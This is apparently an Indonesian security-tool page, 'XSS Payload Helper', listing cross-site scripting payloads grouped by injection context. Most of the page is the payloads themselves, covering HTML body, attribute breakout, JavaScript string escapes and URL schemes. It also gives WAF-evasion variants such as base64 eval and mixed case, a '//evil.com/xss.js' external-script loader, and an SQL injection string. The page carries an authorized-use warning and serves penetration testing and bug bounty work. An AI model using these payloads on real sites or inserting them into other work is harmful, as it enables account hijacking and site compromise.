Security Testing Tool

XSS Payload Helper

Template payload Cross-Site Scripting (XSS) berdasarkan konteks injeksi. Pilih kategori sesuai di mana teks Anda masuk ke halaman — HTML body, atribut, script, atau URL — dan ambil payload yang relevan untuk pengujian.

Untuk penggunaan yang diotorisasi saja. Gunakan tool ini hanya pada sistem yang Anda miliki, memiliki izin tertulis untuk menguji, atau dalam konteks bug bounty program yang berlaku. Pengujian tanpa izin adalah tindakan ilegal.

Pilih Konteks Injeksi

Injeksi langsung di dalam konten HTML, tidak di dalam atribut atau tag script.

<script>alert(document.domain)</script>

Klasik, blokir oleh CSP script-src

<img src=x onerror="alert(document.domain)">

Event handler pada tag yang tidak valid

<svg onload="alert(document.domain)">

SVG onload, tidak perlu closing tag

<body onload="alert(document.domain)">

Hanya efektif jika body belum ada

<input onfocus=alert(document.domain) autofocus>

Trigger otomatis tanpa interaksi

<details open ontoggle="alert(document.domain)">

HTML5 element, sering lolos filter

<video src=1 onerror="alert(document.domain)">

Media element event handler

<iframe src="javascript:alert(document.domain)"></iframe>

javascript: scheme di src

<math><mtext></p><img src=x onerror=alert(document.domain)>

MathML parser confusion

Injeksi di dalam nilai atribut HTML. Perlu menutup atribut yang sedang berjalan dulu.

" onmouseover="alert(document.domain)

Double quote breakout + event handler

' onclick='alert(document.domain)

Single quote breakout

" autofocus onfocus="alert(document.domain)

Trigger otomatis saat focus

"><script>alert(document.domain)</script>

Keluar dari tag lalu inject script

"><img src=x onerror=alert(document.domain)>

Keluar dari tag + img onerror

" onblur="alert(document.domain)" tabindex="1

Event handler alternatif

' OR '1'='1

Template SQLi untuk context campuran

Injeksi di dalam blok JavaScript yang sudah ada, misalnya di string assignment.

';alert(document.domain)//

Tutup string dengan ' lalu inject

";alert(document.domain)//

Tutup string dengan " lalu inject

\';alert(document.domain)//

Escape backslash lalu tutup string

${alert(document.domain)}

Template literal injection

</script><script>alert(document.domain)</script>

Tutup tag script lalu buka baru

'-alert(document.domain)-'

Aritmatika string, tidak butuh semicolon

\u0027;alert(document.domain)//

Unicode escape untuk single quote

Injeksi di dalam atribut href, src, atau nilai URL lainnya.

javascript:alert(document.domain)

javascript: scheme, browser modern mulai blokir

javascript:void(alert(document.domain))

Variant void()

data:text/html,<script>alert(1)</script>

data: URL dengan HTML content

//evil.com/xss.js

Protocol-relative URL untuk load skrip eksternal

javascript:%61lert(document.domain)

Percent-encode karakter untuk bypass filter

Variasi encoding dan obfuscation untuk melewati Web Application Firewall.

<ScRiPt>alert(1)</sCrIpT>

Mixed case, bypass case-sensitive filter

<img src=x oNerRoR=alert(1)>

Mixed case pada event handler

<svg/onload=alert(1)>

Tanpa spasi antara tag dan atribut

<img src=x onerror="alert(1)">

HTML entity encoding

<script>eval(atob("YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="))</script>

Base64 eval, bypass kata kunci alert

<script>window["ale"+"rt"](1)</script>

String concatenation bypass

<svg><script>alert(1)</script></svg>

SVG + entity di dalam script

<img src=1 href=1 onerror="javascript:alert(1)">

Noise attribute untuk bypass parser

<j onfocus=alert(1) id=x tabindex=1>#x

Unknown tag + fragment untuk focus

Custom Payload Encoder

Encode payload custom untuk melewati filter tertentu.

Payload

Output

Memahami Konteks Injeksi XSS

Keberhasilan XSS sangat bergantung pada di mana input pengguna ditempatkan dalam halaman HTML. Konteks yang salah akan membuat payload tidak berjalan:

HTML Body — Input langsung jadi konten HTML. Bisa langsung inject tag seperti <script> atau <img onerror>.
HTML Attribute — Input masuk sebagai nilai atribut. Perlu menutup atribut dengan " atau ' sebelum inject event handler.
JavaScript Context — Input di-embed di dalam blok JavaScript. Perlu menutup string atau statement yang sedang berjalan.
URL/href — Input menjadi nilai URL. javascript: scheme dan data: URL bisa menjalankan script.

Payload alert(document.domain) adalah pilihan standar bug bounty karena membuktikan eksekusi script di domain target tanpa side effect yang merusak.

Tool Lainnya

URL Encoder / Decoder Encode/decode URL component atau full URL HTTP Security Header Checker Analisis 10 header keamanan HTTP Reverse Shell Builder Generate one-liner reverse shell Semua Tools → Jelajahi tools SiberInd lainnya